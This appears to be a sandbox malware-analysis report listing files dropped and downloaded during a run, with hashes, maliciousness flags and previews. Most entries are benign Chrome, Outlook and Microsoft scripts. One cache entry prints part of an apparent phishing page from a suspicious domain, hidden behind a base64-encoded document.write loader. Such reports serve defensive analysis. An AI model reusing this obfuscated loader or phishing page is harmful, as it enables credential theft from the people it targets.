                                                                SHA1:F49CF6A56937160A2B45E6EF7E4A4B5D456683CB
                                                                SHA-256:C56026389B2584A47DCE7FE50753839266F71F547A56FEA524BE1C29DEFA0023
                                                                SHA-512:122E84E40B186FD241462828F6FF691C667A2AAE725C036676350B360FC437655DF58F5185EF6968736DE2C9977B3CE2E44F066BB903BD1EBA5DA89DC0CD5C29
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:L..................F.@.. ...$+.,.......7..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IoY}.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VoY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VoY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VoY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VoY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........n.6......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

                                                                Download File
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Nov 15 19:12:33 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                Category:dropped
                                                                Size (bytes):2675
                                                                Entropy (8bit):4.000327326578854
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:A07E4ADA8C1B1698A77AE1837302EA89
                                                                SHA1:B65570CEF513187667901A225890ED6472A894FA
                                                                SHA-256:2991852B7300280CA22CCBE2BFED82BC01DD173F4B5D9244E4A571D402DA8C6B
                                                                SHA-512:BBB687A39E1028E83C4B332BAA27D0EBB116E8E7F46EB164A79C81E9DD04F60A5FA3EE03FC72C5A3DC3173CE327815468D5AB75121C35CB29B712E648E77A2C1
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:L..................F.@.. ...$+.,....(T...7..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IoY}.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VoY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VoY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VoY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VoY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........n.6......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

                                                                Download File
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                Category:dropped
                                                                Size (bytes):2689
                                                                Entropy (8bit):4.0064229982503266
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:816CF523C26E3E6B3859C5E4EF559305
                                                                SHA1:BD1716E80E3DE14DA111C1784638F5D51F4E6FBB
                                                                SHA-256:4A438A76C147A69F3AC40E6FACA7398D43D60CDCA226F7D10C1B6514B7D24DDE
                                                                SHA-512:9721806DA33DC468BCF58C0A9406E02E0342B9F7B82DC37EF940B2A71331CC34FA7DA3EC21A0F790F1D0A28AF218E21F7093F69D38B3F609D8D85A3A85CEAC77
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IoY}.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VoY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VoY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VoY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........n.6......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

                                                                Download File
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Nov 15 19:12:33 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                Category:dropped
                                                                Size (bytes):2677
                                                                Entropy (8bit):3.995908833152216
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:8D564EB2B3D90DC0DAE7CC199D39705D
                                                                SHA1:E92D1972600B801644F7BDE3A9E0AAEF367AA395
                                                                SHA-256:F6DBCF33BE54C6111A50CB8CA35F70864E23302571C52ED13F3063254F8461A5
                                                                SHA-512:0347E224FEC5085727B344FDDE638C721C3C0B866A9FABD747D60783EC363BFBD5B14E1E9DA248FA9A34F66CEE206458CCB6D0348FCAB44AFC6806FB50417BDE
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:L..................F.@.. ...$+.,....f9...7..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IoY}.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VoY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VoY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VoY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VoY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........n.6......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

                                                                Download File
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Nov 15 19:12:33 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                Category:dropped
                                                                Size (bytes):2677
                                                                Entropy (8bit):3.9839624607127586
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:38BC9B9CABFAACA711F59652AC3DE57D
                                                                SHA1:1EBEE77D7F596A672457CC0C8AA6BF0D411D5C51
                                                                SHA-256:D7CD5ED15ADF728355F1925F64C950CD5EFDDD35AE0B7344F92D38458896A53D
                                                                SHA-512:7696061AD9E1D6193E4D093D95846A41B9C9DBFF1D56F0ABB6D3AEB35CE5FFF63DE049DC7850ED04C7B5920BB43F9B76002D90AE6E898601467E1A9DD5DF09AF
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:L..................F.@.. ...$+.,....SG...7..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IoY}.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VoY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VoY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VoY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VoY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........n.6......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

                                                                Download File
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Nov 15 19:12:32 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                Category:dropped
                                                                Size (bytes):2679
                                                                Entropy (8bit):3.995274545513944
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:380B6BC7C8CF95BDF9A29D11E4F715A4
                                                                SHA1:82956BCFDEE56A74FC2BD3FC8336F15D13ABD55F
                                                                SHA-256:E75CD45C088C253FE1D48B930623D90C3C1D60C6B98CC2C1769A595205FD1907
                                                                SHA-512:887F338E4B55AADAC8B480950728ACD7D13005D4C748FB68640DD8086A626AF356A1D5E78B29A6499720E1CA52F1F90D27343E8D2B36DBDA19825B5D6F9F995E
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:L..................F.@.. ...$+.,......u..7..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IoY}.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VoY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VoY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VoY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VoY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........n.6......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                C:\Users\user\Documents\Outlook Files\Outlook Data File - NoEmail.pst

                                                                Download File
                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                File Type:Microsoft Outlook email folder (>=2003)
                                                                Category:dropped
                                                                Size (bytes):2302976
                                                                Entropy (8bit):1.3455104413868888
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:FCB5237533859A4E2106C6FE320B217B
                                                                SHA1:ACBBC0B06BD4442EA6924E1CB590F6CF86F47B73
                                                                SHA-256:81946A7396A1C06C8F528DA0E0E948477F04269D5342975DAFB2EA097E5087F5
                                                                SHA-512:5F58DE19971BD4D5E27FB623FC3336C810AD8BA690194830D0455931DEC6800D9D55CB73DFF647BED4B5AC3F4157665A77D6C434793BBC68C43170F2A2275904
                                                                Malicious:true
                                                                Reputation:unknown
                                                                Preview:!BDN.lv.SM......\...............<.......e................@...........@...@...................................@...........................................................................$#......D.......<..............;........ ......8....................................................................................................................................................................................................................................................................................................s)...$.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                C:\Users\user\Documents\Outlook Files\~Outlook Data File - NoEmail.pst.tmp

                                                                Download File
                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):393216
                                                                Entropy (8bit):5.253414177367724
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:A175A4FA667759E0CD1DA432DE442726
                                                                SHA1:412C03798DD0DD50BD9A67B81EB9B346026EDE55
                                                                SHA-256:0D0FC579AF48FA9EFFD896F16E2CCE1E542F4C523774B02D419C2704422F2669
                                                                SHA-512:F6323476EF7ABBBF7AEF1508CB647B49E6D54E38BED56C060158AE4AE8D05D1A3EA77771A3A23CF476AA5A8FE4C75B9917A4ED06436EDC3D002E56A4EB2BCB5B
                                                                Malicious:true
                                                                Reputation:unknown
                                                                Preview:y..C...x................7....................#.!BDN.lv.SM......\...............<.......e................@...........@...@...................................@...........................................................................$#......D.......<..............;........ ......8....................................................................................................................................................................................................................................................................................................s)...$......7.......B............#.........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                Chrome Cache Entry: 113

                                                                Download File
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                Category:dropped
                                                                Size (bytes):48316
                                                                Entropy (8bit):5.6346993394709
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:2CA03AD87885AB983541092B87ADB299
                                                                SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();

                                                                Chrome Cache Entry: 119

                                                                Download File
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:HTML document, ASCII text, with very long lines (3450), with CRLF line terminators
                                                                Category:downloaded
                                                                Size (bytes):3452
                                                                Entropy (8bit):5.117912766689607
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:CB06E9A552B197D5C0EA600B431A3407
                                                                SHA1:04E167433F2F1038C78F387F8A166BB6542C2008
                                                                SHA-256:1F4EDBD2416E15BD82E61BA1A8E5558D44C4E914536B1B07712181BF57934021
                                                                SHA-512:1B4A3919E442EE4D2F30AE29B1C70DF7274E5428BCB6B3EDD84DCB92D60A0D6BDD9FA6D9DDE8EAB341FF4C12DE00A50858BF1FC5B6135B71E9E177F5A9ED34B9
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://login.live.com/Me.htm?v=3
                                                                Preview:<script type="text/javascript">!function(t,e){for(var s in e)t[s]=e[s]}(this,function(t){function e(n){if(s[n])return s[n].exports;var i=s[n]={exports:{},id:n,loaded:!1};return t[n].call(i.exports,i,i.exports,e),i.loaded=!0,i.exports}var s={};return e.m=t,e.c=s,e.p="",e(0)}([function(t,e){function s(t){for(var e=f[S],s=0,n=e.length;s<n;++s)if(e[s]===t)return!0;return!1}function n(t){if(!t)return null;for(var e=t+"=",s=document.cookie.split(";"),n=0,i=s.length;n<i;n++){var a=s[n].replace(/^\s*(\w+)\s*=\s*/,"$1=").replace(/(\s+$)/,"");if(0===a.indexOf(e))return a.substring(e.length)}return null}function i(t,e,s){if(t)for(var n=t.split(":"),i=null,a=0,r=n.length;a<r;++a){var c=null,S=n[a].split("$");if(0===a&&(i=parseInt(S.shift()),!i))return;var l=S.length;if(l>=1){var p=o(i,S[0]);if(!p||s[p])continue;c={signInName:p,idp:"msa",isSignedIn:!0}}if(l>=3&&(c.firstName=o(i,S[1]),c.lastName=o(i,S[2])),l>=4){var f=S[3],d=f.split("|");c.otherHashedAliases=d}if(l>=5){var h=parseInt(S[4],16);h&&(c.

                                                                Chrome Cache Entry: 122

                                                                Download File
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (513), with no line terminators
                                                                Category:downloaded
                                                                Size (bytes):513
                                                                Entropy (8bit):5.350826451115093
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:602C381194795DFC124FACDF48492EF1
                                                                SHA1:90D594B7B5AF217824F2974514548C95FECFBFA5
                                                                SHA-256:BF450798FB52E2458A1E10749577E5334F3E1D7907A47FDFEA5430CB71FA19E6
                                                                SHA-512:8837F6BD2A11387D31A866D07B66A0FF2E58D2EDC2682A582919A1896CE9B4CB683A795D91968B41FA46C31CE62D34414E1F3318D4F5DDA2999447F4BCA6133D
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://c.s-microsoft.com/en-us/CMSScripts/script.jsx?k=f65ecb70-094d-0b11-7c9d-7da1bcadfaa7
                                                                Preview:var jsllConfig={useDefaultContentName:!0,syncMuid:!0,authMethod:AUTHMETHOD,isLoggedIn:ISLOGGEDIN===undefined||ISLOGGEDIN!=="True"?!1:!0,muidDomain:MUIDDOMAIN||"microsoft.com",useShortNameForContentBlob:!1,autoCapture:{pageView:!0,onLoad:!0,onUnload:!0,click:!0,scroll:!0,resize:!0,lineage:!0,jsError:!0,addin:!0,perf:!0},coreData:{appId:JSLLAPPID,market:LOCALE,pageName:PAGENAME,pageType:PAYLOADTYPE,referrerUri:document.referrer,requestUri:window.location.href},callback:{pageName:PAGENAME}};awa.init(jsllConfig)

                                                                Chrome Cache Entry: 123

                                                                Download File
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                                                Category:dropped
                                                                Size (bytes):1435
                                                                Entropy (8bit):7.8613342322590265
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:9F368BC4580FED907775F31C6B26D6CF
                                                                SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                                                SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                                                SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.

                                                                Chrome Cache Entry: 124

                                                                Download File
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (46591)
                                                                Category:downloaded
                                                                Size (bytes):142367
                                                                Entropy (8bit):5.430597817875451
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:CCAA31FD031C4C856EB7B986FD9F447B
                                                                SHA1:0A809EABCDB95FA04DE5F8409B3BC994ED65CBD1
                                                                SHA-256:3D40B4129B8B4C284908636AE46D72EA053F286FB5FE45DB78351B5B2CFC1EB9
                                                                SHA-512:4B5B2271DB5F640FEBF13A7C0BDBD630C73530000F1593046D090585D1752E239D894614E23E801BE4C6A379406B6EF521423FA27C3865C3CD4ABB0A64823780
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://aadcdn.msftauth.net/shared/1.0/content/js/BssoInterrupt_Core_zKox_QMcTIVut7mG_Z9Eew2.js
                                                                Preview:/*!. * ------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------. * . * This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise.. * . * json2.js (2016-05-01). * https://github.com/douglascrockford/JSON-js. * License: Public Domain. * . * Provided for Informational Purposes Only. * . * ----------------------------------------------- END OF THIRD PARTY NOTICE ------------------------------------------. */!function(e){function t(t){for(var n,r,i=t[0],a=t[1],s=0,u=[];s<i.length;s++)

                                                                Chrome Cache Entry: 125

                                                                Download File
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:HTML document, ASCII text, with very long lines (5481), with CRLF line terminators
                                                                Category:downloaded
                                                                Size (bytes):15880
                                                                Entropy (8bit):5.926995596321435
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:5F4991D277F35CB0E590DC07DFD74592
                                                                SHA1:4C72292D83366BC03D6B28B2C2DF0E6FF46E4C2C
                                                                SHA-256:3E922C5DAFD37C9E0361DC9B54FAD5626507072A76B915D11D63A90553916F89
                                                                SHA-512:F6253F53D06B29ADFCE3D028849B7EF6DDA9E8CE0067D858E26C448FCD4D9B0FC8A7C3750BBAB24489D6A2D50143F437A0FC200A49265781190240D697893B3F
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://mrwa.ungonditc.com/aIEqPG/
                                                                Preview: Success is not in what you have, but who you are. -->..<script>../* Persistence is the key to achieving great things. */..if(atob("aHR0cHM6Ly9NcndhLnVuZ29uZGl0Yy5jb20vYUlFcVBHLw==") == "nomatch"){..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2NyeXB0by1qcy80LjEuMS9jcnlwdG8tanMubWluLmpzIj48L3NjcmlwdD4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UsY2hyb21lPTEiPg0KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4NCiAgICA8dGl0bGU+JiM4MjAzOzwvdGl0bGU+DQogICAgPHN0eWxlPg0KYm9keSB7DQ

                                                                Chrome Cache Entry: 126

                                                                Download File
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (47671)
                                                                Category:downloaded
                                                                Size (bytes):47672
                                                                Entropy (8bit):5.401921124762015
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:B804BCD42117B1BBE45326212AF85105
                                                                SHA1:7B4175AAF0B7E45E03390F50CB8ED93185017014
                                                                SHA-256:B7595C3D2E94DF7416308FA2CCF5AE8832137C76D2E9A8B02E6ED2CB2D92E2F7
                                                                SHA-512:9A4F038F9010DDCCF5E0FAF97102465EF7BA27B33F55C4B86D167C41096DB1E76C8212A5E36565F0447C4F57340A10DB07BB9AE26982DFFF92C411B5B1F1FB97
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://challenges.cloudflare.com/turnstile/v0/b/22755d9a86c9/api.js
                                                                Preview:"use strict";(function(){function Ht(e,r,n,o,c,l,g){try{var h=e[l](g),u=h.value}catch(f){n(f);return}h.done?r(u):Promise.resolve(u).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var l=e.apply(r,n);function g(u){Ht(l,o,c,g,h,"next",u)}function h(u){Ht(l,o,c,g,h,"throw",u)}g(void 0)})}}function V(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):V(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS

                                                                Chrome Cache Entry: 127

                                                                Download File
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (65447)
                                                                Category:dropped
                                                                Size (bytes):89501
                                                                Entropy (8bit):5.289893677458563
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
